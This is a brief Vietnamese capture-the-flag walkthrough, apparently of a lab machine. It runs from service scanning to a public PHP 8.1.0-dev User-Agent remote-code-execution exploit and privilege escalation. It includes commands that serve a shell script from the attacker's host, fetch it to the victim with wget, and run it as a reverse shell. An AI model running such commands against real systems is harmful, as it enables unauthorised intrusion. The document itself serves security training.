Information Gathering

Địa chỉ IP:

10.10.10.242

Quét các dịch vụ mạng:

• Dịch vụ SSH: OpenSSH 8.2p1 Ubuntu 4ubuntu0.2

• Dịch vụ Web: Apache httpd 2.4.41

Giao diện trang web:

Phiên bản của PHP mà trang web sử dụng là

PHP/8.1.0-dev

Public Exploit

Có 1 khai thác liên quan đến PHP/8.1.0-dev đã được công bố

Thực thi lệnh từ xa bằng header User-Agent

Enumeration

Tìm được tệp user.txt

Liệt kê các lệnh người dùng có thể thực thi dưới quyền root:

Privilege Escalation

Leo thang đặc quyền bằng knife nhưng không được

Shell bạn lấy đc không có linh hoạt, không dùng được nhiều tính năng

Mình sẽ vận chuyển tệp thực thi shell đến máy nạn nhân

python3 -m http.server 80

wget http://10.10.14.4/shell.sh -O /tmp/shell.sh

Thử reverse shell:

./tmp/shell.sh

Leo thang đặc quyền:

Tìm được tệp root.txt